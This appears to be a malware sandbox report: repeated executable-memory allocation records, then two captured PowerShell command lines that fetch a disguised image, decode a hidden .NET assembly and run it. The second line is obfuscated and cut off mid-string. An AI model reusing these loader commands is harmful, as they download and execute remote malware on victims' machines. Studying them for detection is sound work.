heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0252b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02527000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02525000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0252c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f15000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f16000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f17000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f18000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f19000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LnNrbmlMeXR0dVAvZWxpZi8yMTIuMzExLjU3MS43MDEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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KGXkhpYIrIKGXHMhpYIrIKGXdhpYIrIKGXBhhpYIrIKGXHIhpYIrIKGXdhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGchpYIrIKGXZQhpYIrIKGXghpYIrIKGXDhpYIrIKGXhpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGEhpYIrIKGXbgBkhpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGchpYIrIKGXdhpYIrIKGXhpYIrIKGXghpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEkhpYIrIKGXbgBkhpYIrIKGXGUhpYIrIKGXehpYIrIKGXhpYIrIKGX7hpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEkhpYIrIKGXbgBkhpYIrIKGXGUhpYIrIKGXehpYIrIKGXhpYIrIKGXghpYIrIKGXCshpYIrIKGXPQhpYIrIKGXghpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEYhpYIrIKGXbhpYIrIKGXBhhpYIrIKGXGchpYIrIKGXLgBMhpYIrIKGXGUhpYIrIKGXbgBnhpYIrIKGXHQhpYIrIKGXahpYIrIKGXhpYIrIKGX7hpYIrIKGXCQhpYIrIKGXYgBhhpYIrIKGXHMhpYIrIKGXZQhpYIrIKGX2hpYIrIKGXDQhpYIrIKGXThpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZwB0hpYIrIKGXGghpYIrIKGXIhpYIrIKGXhpYIrIKGX9hpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBzhpYIrIKGXHQh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